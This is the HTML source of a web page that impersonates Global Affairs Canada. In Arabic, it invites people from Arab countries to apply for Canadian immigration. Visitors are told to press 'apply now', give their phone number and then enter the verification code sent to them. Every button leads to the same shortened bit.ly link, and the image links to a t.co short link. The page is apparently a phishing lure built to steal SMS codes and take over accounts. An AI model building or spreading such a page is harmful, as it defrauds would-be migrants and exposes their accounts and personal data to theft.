<!DOCTYPE HTML>
<html lang="en">
	<head>
		<title>Global Affairs Canada</title>
		<meta charset="utf-8" />
		<meta name="viewport" content="width=device-width,initial-scale=1" />
		<meta name="description" content="سوف نبدأ في إستقبال طلبات الهجرة من جميع دول الوطن العربي إلي ✈ " 🇨🇦 كندا " ." />
		<meta property="og:site_name" content="سوف نبدأ في إستقبال طلبات الهجرة من جميع دول الوطن العربي إلي ✈ " 🇨🇦 كندا " ." />
		<meta property="og:title" content="قم بملئ إستمارة التسجيل من هنا :" />
		<meta property="og:type" content="website" />
		<meta property="og:description" content="قم بملئ إستمارة التسجيل من هنا :" />
		<link href="https://fonts.googleapis.com/css?display=swap&family=Asap:700,700italic" rel="stylesheet" type="text/css" />
		<link rel="stylesheet" href="assets/main.css" />
		<noscript><link rel="stylesheet" href="assets/noscript.css" /></noscript>
	</head>
	<body class="is-loading">
		<div id="wrapper">
			<div id="main">
				<div class="inner">
					<div id="image01" class="image" data-position="center">
						<a href="https://t.co/QsQHrZCjs0" class="frame"><img src="assets/images/image01.jpg" alt="" /></a>
					</div>
					<hr id="divider01">
					<h1 id="text02"><span class="p"> Global Affairs Canada
      
						<br /> </span></h1>
					
					<p id="text01"><span class="p">
                        <h6>سوف نبدأ في إستقبال طلبات الهجرة من جميع دول الوطن العربي إلي ✈ " 🇨🇦 كندا " .							<h6>
                        <h6>اضغط علي تقديم طلب الان واضف رقم هاتفك صحيح واضف الكود المرسل لك لاستكمال ملئ الاستمارة							<h6>
											
					</span><span class="p"></span></p>
					<h1>اضغط تقديم طلب الان</h1> 	
					<div id="container01" class="container default">
						<div class="wrapper">
							<div class="inner">
								 
								<ul id="buttons03" class="buttons">
									 
									 
									<li>
										<a href="https://bit.ly/sudtest11" class="button n01"><svg><use xlink:href="assets/icons.svg#globe"></use></svg><span class="label">تقديم طلب الان </span></a>
									</li>
									<li>
										<a href="https://bit.ly/sudtest11" class="button n01"><svg><use xlink:href="assets/icons.svg#globe"></use></svg><span class="label">وظائف اخري   </span></a>
									</li>
								</ul>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
		<script src="assets/main.js"></script>
	</body>
</html>
